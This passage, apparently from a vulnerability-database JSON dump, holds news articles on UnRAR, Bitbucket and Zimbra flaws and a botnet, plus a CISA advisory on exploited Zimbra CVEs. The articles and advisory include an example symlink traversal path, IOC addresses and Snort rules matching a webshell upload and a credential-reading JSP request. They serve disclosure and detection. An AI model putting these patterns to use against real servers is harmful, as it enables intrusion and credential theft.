false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-05T05:54:43", "id": "THN:EAE0157F6308D86DB939FA200A017132", "href": "https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-29T09:57:40", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjN3zLpss2pKUyanmGpqvd3WNmNtqxxQU175HcLleaX5NVZ--XqPkZ3JE_TfVGP-jm2ix_AbmnMBXlL5HybtnrtcoTSfKLR9RBlku3ezXjS3lXo9eJ39tgt6ypZlGhtD_bulRIUWTN5bWFBRIm3JkoKOAeIoPT4KOFL4eJvKUHfp8hcUiDnXYtrie0-/s728-e100/zimbra.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjN3zLpss2pKUyanmGpqvd3WNmNtqxxQU175HcLleaX5NVZ--XqPkZ3JE_TfVGP-jm2ix_AbmnMBXlL5HybtnrtcoTSfKLR9RBlku3ezXjS3lXo9eJ39tgt6ypZlGhtD_bulRIUWTN5bWFBRIm3JkoKOAeIoPT4KOFL4eJvKUHfp8hcUiDnXYtrie0-/s728-e100/zimbra.jpg>)\n\nA new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.\n\nThe flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nFollowing responsible disclosure on May 4, 2022, the shortcoming was addressed by RarLab as part of [version 6.12](<https://www.rarlab.com/download.htm>) released on May 6. Other versions of the software, including those for Windows and Android operating systems, are not impacted.\n\n\"An attacker is able to create files outside of the target extraction directory when an application or victim user extracts an untrusted archive,\" SonarSource researcher Simon Scannell [said](<https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/>) in a Tuesday report. \"If they can write to a known location, they are likely to be able to leverage it in a way leading to the execution of arbitrary commands on the system.\"\n\nIt's worth pointing out that any software that utilizes an unpatched version of UnRAR to extract untrusted archives is affected by the flaw.\n\nThis also includes Zimbra collaboration suite, wherein the vulnerability could lead to pre-authenticated remote code execution on a vulnerable instance, giving the attacker complete access to an email server and even abuse it to access or overwrite other internal resources within the organization's network.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXuk9ne68WQi3sRiGi6fs-jXeKLsg-dnVM8xRMSWOeFCACmmXEwCbw3IGXFdaxRGs6WfFL1rBphfCvNVl7kWXv1w6F7PwCboZNdniHyZhy2wQ11dEMFL16Ks3IRMUIER3jtyRNZh0v082Rx1dOLwbjdXI22q6XB82ixKwBYdMfOOZ8CE9GBq1VhuxB/s728-e100/tweet.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXuk9ne68WQi3sRiGi6fs-jXeKLsg-dnVM8xRMSWOeFCACmmXEwCbw3IGXFdaxRGs6WfFL1rBphfCvNVl7kWXv1w6F7PwCboZNdniHyZhy2wQ11dEMFL16Ks3IRMUIER3jtyRNZh0v082Rx1dOLwbjdXI22q6XB82ixKwBYdMfOOZ8CE9GBq1VhuxB/s728-e100/tweet.jpg>) \n--- \nImage Source: [Simon Scannell](<https://twitter.com/scannell_simon/status/1541800107909185537>) \n \nThe vulnerability, at its heart, relates to a [symbolic link](<https://en.wikipedia.org/wiki/Symbolic_link>) attack in which a RAR archive is crafted such that it contains a symlink that's a mix of both forward slashes and backslashes (e.g., \"..\\\\..\\\\..\\tmp/shell\") so as to bypass current checks and extract it outside of the expected directory.\n\nMore specifically, the weakness has to do with a function that's designed to convert backslashes ('\\') to forward slashes ('/') so that a RAR archive created on Windows can be extracted on a Unix system, effectively altering the aforementioned symlink to \"../../../tmp/shell.\"\n\nBy taking advantage of this behavior, an attacker can write arbitrary files anywhere on the target filesystem, including creating a JSP shell in Zimbra's web directory and execute malicious commands.\n\n\"The only requirement for this attack is that UnRAR is installed on the server, which is expected as it is required for RAR archive virus-scanning and spam-checking,\" Scannell noted.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-29T09:29:00", "type": "thn", "title": "New UnRAR Vulnerability Could Let Attackers Hack Zimbra Webmail Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-06-29T09:29:21", "id": "THN:7657424EABF9BB266876E3BD437269F4", "href": "https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-26T21:05:40", "description": "[![Atlassian Bitbucket Server](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEht47PjDsMvjJ9kqXVY93JT-g-RYVjOAP5VxCZONwv0lzWNeaf_YSAF2URt_22Nb5rL7OzlB61cd8tBDKnHt8bx4kCUOlhonjbe0sfALpK-LaBnFYtM8ZqW4fKdEqTRGxRelq2Enc1wc8_8-oxdZSMZKG-op5rEQxiWnod-JNyPD2RLsDr6DB7MaCDt/s728-e1000/bitbucket.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEht47PjDsMvjJ9kqXVY93JT-g-RYVjOAP5VxCZONwv0lzWNeaf_YSAF2URt_22Nb5rL7OzlB61cd8tBDKnHt8bx4kCUOlhonjbe0sfALpK-LaBnFYtM8ZqW4fKdEqTRGxRelq2Enc1wc8_8-oxdZSMZKG-op5rEQxiWnod-JNyPD2RLsDr6DB7MaCDt/s728-e100/bitbucket.jpg>)\n\nAtlassian has rolled out fixes for a [critical security flaw](<https://confluence.atlassian.com/security/august-2022-atlassian-security-advisories-overview-1155155092.html>) in Bitbucket Server and Data Center that could lead to the execution of malicious code on vulnerable installations.\n\nTracked as **CVE-2022-36804** (CVSS score: 9.9), the issue has been characterized as a command injection vulnerability in multiple endpoints that could be exploited via specially crafted HTTP requests.\n\n\"An attacker with access to a public Bitbucket repository or with read permissions to a private one can execute arbitrary code by sending a malicious HTTP request,\" Atlassian [said](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) in an advisory.\n\nThe shortcoming, discovered and reported by security researcher [@TheGrandPew](<https://twitter.com/TheGrandPew>) impacts all versions of Bitbucket Server and Datacenter released after 6.10.17, inclusive of 7.0.0 and newer -\n\n * Bitbucket Server and Datacenter 7.6\n * Bitbucket Server and Datacenter 7.17\n * Bitbucket Server and Datacenter 7.21\n * Bitbucket Server and Datacenter 8.0\n * Bitbucket Server and Datacenter 8.1\n * Bitbucket Server and Datacenter 8.2, and\n * Bitbucket Server and Datacenter 8.3\n\nAs a temporary workaround in scenarios where the patches cannot be applied right away, Atlassian is recommending turning off public repositories using \"feature.public.access=false\" to prevent unauthorized users from exploiting the flaw.\n\n\"This can not be considered a complete mitigation as an attacker with a user account could still succeed,\" it cautioned, meaning it could be leveraged by threat actors who are already in possession of valid credentials obtained through other means.\n\nUsers of affected versions of the software are recommended to upgrade their instances to the latest version as soon as possible to mitigate potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-08-26T19:39:00", "type": "thn", "title": "Critical Vulnerability Discovered in Atlassian Bitbucket Server and Data Center", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-08-26T19:42:02", "id": "THN:F3EF5A59C1D2BE2109DA45313D74AAAD", "href": "https://thehackernews.com/2022/08/critical-vulnerability-discovered-in.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[![Atlassian Bitbucket Server Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6oZ5dJM2S7ilfvZMV9PyYaCJ0jSoY8jAwhLdFauejcV5UhGTtMFBkhEt5B1lWw1yJ_zv-oqVMsBru8CAXWR393g8Uda_fcUNI9pUQfMtO_j2VNRaoLWlfTaHlS4Ls469veRQv31jYows6p4En8JweWTC0BuQ5m_NJR1YUWTQfzG4bmfYhCe-XICwl/s728-e1000/bitbucket.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6oZ5dJM2S7ilfvZMV9PyYaCJ0jSoY8jAwhLdFauejcV5UhGTtMFBkhEt5B1lWw1yJ_zv-oqVMsBru8CAXWR393g8Uda_fcUNI9pUQfMtO_j2VNRaoLWlfTaHlS4Ls469veRQv31jYows6p4En8JweWTC0BuQ5m_NJR1YUWTQfzG4bmfYhCe-XICwl/s728-e100/bitbucket.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog>) a recently disclosed critical flaw impacting Atlassian's Bitbucket Server and Data Center to the Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog, citing evidence of active exploitation.\n\nTracked as [CVE-2022-36804](<https://thehackernews.com/2022/08/critical-vulnerability-discovered-in.html>), the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary code execution on susceptible installations by sending a specially crafted HTTP request.\n\nSuccessful exploitation, however, banks on the prerequisite that the attacker already has access to a public repository or possesses read permissions to a private Bitbucket repository.\n\n\"All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability,\" Atlassian [noted](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) in a late August 2022 advisory.\n\nCISA did not provide further details about how the flaw is being exploited and how widespread exploitation efforts are, but GreyNoise [said](<https://viz.greynoise.io/tag/atlassian-bitbucket-server-rce-attempt?days=30>) it detected evidence of in-the-wild abuse on September 20 and 23.\n\nAs countermeasures, all Federal Civilian Executive Branch (FCEB) agencies are required to remediate the vulnerabilities by October 21, 2022 to protect networks against active threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T06:35:00", "type": "thn", "title": "CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-10-02T05:17:23", "id": "THN:22B4D07257A8FC49E106EC6A52499B31", "href": "https://thehackernews.com/2022/10/cisa-warns-of-hackers-exploiting.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-25T03:59:16", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\n[![Cryptocurrency Miners](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e1000/malware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-06-06T18:28:22", "description": "### Summary\n\nActions for ZCS administrators to take today to mitigate malicious cyber activity:\n\n\u2022 Patch all systems and prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Deploy detection signatures and hunt for indicators of compromise (IOCs). \n\u2022 If ZCS was compromised, remediate malicious activity.\n\n_Updated November 10, 2022: This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) with contributions by the Federal Bureau of Investigation (FBI)._\n\nCISA and the MS-ISAC are publishing this joint Cybersecurity Advisory (CSA) in response to active exploitation of multiple Common Vulnerabilities and Exposures (CVEs) against Zimbra Collaboration Suite (ZCS), an enterprise cloud-hosted collaboration software and email platform. CVEs currently being exploited against ZCS include:\n\n * CVE-2022-24682\n * CVE-2022-27924\n * CVE-2022-27925 chained with CVE-2022-37042\n * CVE-2022-30333\n\nCyber threat actors may be targeting unpatched ZCS instances in both government and private sector networks. CISA and the MS-ISAC strongly urge users and administrators to apply the guidance in the Recommendations section of this CSA to help secure their organization\u2019s systems against malicious cyber activity. CISA and the MS-ISAC encourage organizations who did not immediately update their ZCS instances upon patch release, or whose ZCS instances were exposed to the internet, to assume compromise and hunt for malicious activity using the third-party detection signatures in the Detection Methods section of this CSA. Organizations that detect potential compromise should apply the steps in the Incident Response section of this CSA.\n\n**_Updated November 10_**, **_2022_**:\n\nThis CSA has been updated with additional IOCs. For a downloadable copy of the IOCs, see the following Malware Analysis Reports (MARs):\n\n * [MAR-10400779-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270a>)\n * [MAR-10400779-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270b>)\n * [MAR-10401765-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270c>)\n * [MAR-10398871-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-292a>)\n * _New, November 10, 2022:_ [MAR-10410305-1.v1 JSP Webshell](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-314a>)\n\n**_Update End_**\n\nDownload the PDF version of this report: pdf, 480 kb\n\nDownload the IOCs: .stix 12.2 kb\n\n### Technical Details\n\n#### CVE-2022-27924\n\nCVE-2022-27924 is a high-severity vulnerability enabling an unauthenticated malicious actor to inject arbitrary memcache commands into a targeted ZCS instance and cause an overwrite of arbitrary cached entries. The actor can then steal ZCS email account credentials in cleartext form without any user interaction. With valid email account credentials in an organization not enforcing multifactor authentication (MFA), a malicious actor can use spear phishing, social engineering, and business email compromise (BEC) attacks against the compromised organization. Additionally, malicious actors could use the valid account credentials to open webshells and maintain persistent access.\n\nOn March 11, 2022, researchers from SonarSource announced the discovery of this ZCS vulnerability. Zimbra issued fixes for releases 8.8.15 and 9.0 on May 10, 2022. Based on evidence of active exploitation, CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 4, 2022. Due to ease of exploitation, CISA and the MS-ISAC expect to see widespread exploitation of unpatched ZCS instances in government and private networks.\n\n#### CVE-2022-27925 and CVE-2022-37042\n\nCVE-2022-27925 is a high severity vulnerability in ZCS releases 8.8.15 and 9.0 that have mboximport functionality to receive a ZIP archive and extract files from it. An authenticated user has the ability to upload arbitrary files to the system thereby leading to directory traversal.[[1](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)] On August 10, 2022, researchers from Volexity reported widespread exploitation\u2014against over 1,000 ZCS instances\u2014of CVE-2022-27925 in conjunction with CVE-2022-37042.[[2](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)] CISA added both CVEs to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 11, 2022.\n\nCVE 2022 37042 is an authentication bypass vulnerability that affects ZCS releases 8.8.15 and 9.0. CVE 2022 37042 could allow an unauthenticated malicious actor access to a vulnerable ZCS instance. According to Zimbra, CVE 2022 37042 is found in the MailboxImportServlet function.[[3][](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)[4](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)] Zimbra issued fixes in late July 2022.\n\n#### CVE-2022-30333\n\nCVE-2022-30333 is a high-severity directory traversal vulnerability in RARLAB UnRAR on Linux and UNIX allowing a malicious actor to write to files during an extract (unpack) operation. A malicious actor can exploit CVE-2022-30333 against a ZCS server by sending an email with a malicious RAR file. Upon email receipt, the ZCS server would automatically extract the RAR file to check for spam or malware.[[5](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)] Any ZCS instance with unrar installed is vulnerable to CVE-2022-30333.\n\nResearchers from SonarSource shared details about this vulnerability in June 2022.[[6](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)] Zimbra made configuration changes to use the 7zip program instead of unrar.[[7](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)] CISA added CVE-2022-3033 to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 9, 2022. Based on industry reporting, a malicious cyber actor is selling a cross-site scripting (XSS) exploit kit for the ZCS vulnerability to CVE 2022 30333. A Metasploit module is also available that creates a RAR file that can be emailed to a ZCS server to exploit CVE-2022-30333.[[8](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)]\n\n#### CVE-2022-24682\n\nCVE-2022-24682 is a medium-severity vulnerability that impacts ZCS webmail clients running releases before 8.8.15 patch 30 (update 1), which contain a cross-site scripting (XSS) vulnerability allowing malicious actors to steal session cookie files. Researchers from Volexity shared this vulnerability on February 3, 2022[[9](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)], and Zimbra issued a fix on February 4, 2022.[[10](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)] CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on February 25, 2022.\n\nDETECTION METHODS\n\nNote: CISA and the MS-ISAC will update this section with additional IOCs and signatures as further information becomes available.\n\nCISA recommends administrators, especially at organizations that did not immediately update their ZCS instances upon patch release, to hunt for malicious activity using the following third-party detection signatures:\n\n * _**Updated September 27**_, _**2022**_: Hunt for IOCs including:\n\nIP Addresses\n\n| \n\nNote \n \n---|--- \n \n62.113.255[.]70\n\n| \n\nNew September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042 \n \n185.112.83[.]77\n\n| \n\nNew September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042 \n \n207.148.76[.]235\n\n| \n\nA Cobalt Strike command and control (C2) domain \n \n209.141.56[.]190\n\n| \n\nNew September 27, 2022 \n \n * _**Updated August 23**_, _**2022**_: Deploy Snort signatures to detect malicious activity:\n\nalert tcp any any -> any any (msg:\"ZIMBRA: HTTP POST content data '.jsp' file'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"file|3a|\"; nocase; http_client_body; content:\"|2e|jsp\"; http_client_body; fast_pattern; classtype:http-content; reference:cve,2022-30333;)\n\nalert tcp any any -> any any (msg:\"ZIMBRA: Client HTTP Header 'QIHU 360SE'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"QIHU|20|360SE\"; nocase; http_header; fast_pattern; classtype:http-header; reference:cve,2022-30333;)\n\nalert tcp any any -> any any (msg:\"ZIMBRA:HTTP GET URI for Zimbra Local Config\"; sid:x; flow:established,to_server; content:\"/public/jsp/runas.jsp?pwd=zim&i=/opt/zimbra/bin/zmlocalconfig|3a|-s\"; http_uri; classtype:http-uri; reference:cve,2022-30333;) \n\n * Deploy third-party YARA rules to detect malicious activity: \n * See [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n### Mitigations\n\nCISA and the MS-ISAC recommend organizations upgrade to the latest ZCS releases as noted on [Zimbra Security \u2013 News & Alerts](<https://wiki.zimbra.com/wiki/Security_Center>) and [Zimbra Security Advisories](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>).\n\nSee [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) for mitigation steps.\n\nAdditionally, CISA and the MS-ISAC recommend organizations apply the following best practices to reduce risk of compromise:\n\n * **Maintain and test** an incident response plan.\n * **Ensure your organization has a vulnerability management program** in place and that it prioritizes patch management and vulnerability scanning of [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). **Note:** CISA\u2019s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations: [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>). \n * **Properly configure and secure** internet-facing network devices. \n * Do not expose management interfaces to the internet.\n * Disable unused or unnecessary network ports and protocols.\n * Disable/remove unused network services and devices.\n * **Adopt [zero-trust principles and architecture](<https://www.cisa.gov/blog/2021/09/07/no-trust-no-problem-maturing-towards-zero-trust-architectures>)**, including: \n * Micro-segmenting networks and functions to limit or block lateral movements.\n * Enforcing phishing-resistant (MFA) for all users and virtual private network (VPN) connections.\n * Restricting access to trusted devices and users on the networks.\n\n### INCIDENT RESPONSE\n\nIf an organization\u2019s system has been compromised by active or recently active threat actors in their environment, CISA and the MS-ISAC recommend the following initial steps:\n\n 1. **Collect and review artifacts**, such as running processes/services, unusual authentications, and recent network connections.\n 2. **Quarantine or take offline potentially affected hosts**.\n 3. **Reimage compromised hosts**.\n 4. **Provision new account credentials**.\n 5. **Report the compromise** to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870). SLTT government entities can also report to the MS-ISAC ([SOC@cisecurity.org](<mailto:SOC@cisecurity.org>) or 866-787-4722).\n\nSee the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and the MS-ISAC also encourage government network administrators to see CISA\u2019s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide detailed operational procedures for planning and conducting cybersecurity incident and vulnerability response activities.\n\n### ACKNOWLEDGEMENTS\n\nCISA and the MS-ISAC would like to thank Volexity and Secureworks for their contributions to this advisory.\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA and the MS-ISAC do not provide any warranties of any kind regarding this information. CISA and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or 